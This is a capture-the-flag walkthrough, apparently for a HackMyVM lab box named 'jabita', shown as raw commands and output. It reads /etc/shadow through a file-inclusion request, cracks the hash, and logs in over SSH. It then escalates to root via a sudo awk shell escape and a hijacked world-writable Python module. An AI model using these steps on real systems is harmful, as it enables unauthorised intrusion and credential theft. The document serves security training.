GET /building/index.php?page=/etc/shadow HTTP/1.1

LOL

┌──(root💀kali)-[/opt/hmv/jabita]
└─# john hash -w=/usr/share/wordlists/rockyou.txt               
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
joaninha         (jack)     
1g 0:00:00:02 DONE (2022-09-09 07:16) 0.4347g/s 1669p/s 1669c/s 1669C/s energy..dodgers
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
┌──(root💀kali)-[/opt/hmv/jabita]
└─# ssh jack@10.10.10.123        
The authenticity of host '10.10.10.123 (10.10.10.123)' cant be established.
ED25519 key fingerprint is SHA256:Sxz30elYyqNibTrCsnd7Xa6CrZ6qllyKNc+LfOMtZSo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ED25519) to the list of known hosts.
jack@10.10.10.123s password: 
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-47-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Sep  5 01:40:05 PM UTC 2022

  System load:  0.4404296875      Processes:               111
  Usage of /:   51.4% of 9.75GB   Users logged in:         0
  Memory usage: 21%               IPv4 address for enp0s3: 192.163.0.112
  Swap usage:   0%


6 updates can be applied immediately.
3 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


Last login: Mon Sep  5 12:01:58 2022 from 192.163.0.90
jack@jabita:~$ sudo -l
Matching Defaults entries for jack on jabita:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never

User jack may run the following commands on jabita:
    (jaba : jaba) NOPASSWD: /usr/bin/awk
jack@jabita:~$ sudo -u jaba /usr/bin/awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1002(jaba) gid=1002(jaba) groups=1002(jaba)
$ bash 
jaba@jabita:~$
jaba@jabita:/$ sudo -l
Matching Defaults entries for jaba on jabita:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never

User jaba may run the following commands on jabita:
    (root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py
jaba@jabita:/$ cat /usr/bin/clean.py
import wild

wild.first()
jaba@jabita:/$ cd /
jaba@jabita:/$ find . -name wild.py 2>/dev/null
./usr/lib/python3.10/wild.py

Let’s see

jaba@jabita:/$ ls -lash /usr/lib/python3.10/ | grep wild
4.0K -rw-r--rw-  1 root root   29 Sep  5 12:48 wild.py

Write access

jaba@jabita:/$ printf 'import os;os.system("/bin/bash")\n' > /usr/lib/python3.10/wild.py
jaba@jabita:/$ sudo -u root /usr/bin/python3 /usr/bin/clean.py 
root@jabita:/# id
uid=0(root) gid=0(root) groups=0(root)
root@jabita:/#